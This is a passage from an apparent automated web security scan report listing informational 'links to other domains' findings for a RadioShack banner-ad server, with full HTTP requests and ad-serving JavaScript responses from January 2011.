Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1043697033/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1043697033?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1043697033/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1043697033?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1043697033/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1043697033?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1043697033?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.131. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:03:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2037650882?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=2037650882?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.132. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:01:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=334085935?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=334085935?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.133. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161^950191^1183^0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3186
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1360207430?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1360207430?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=2816831=_4d4358f5,8217671154,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=2816831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1360207430/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1360207430?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1360207430?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.134. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90?http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542^950191^81^0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=169827066?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=169827066?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.135. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90?http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542^950191^81^0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3177
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=138763220?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=138763220?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/138763220/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=138763220?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=138763220?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.136. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=78176531?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=78176531?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/78176531/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=78176531?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=78176531?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.137. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

Issue detail

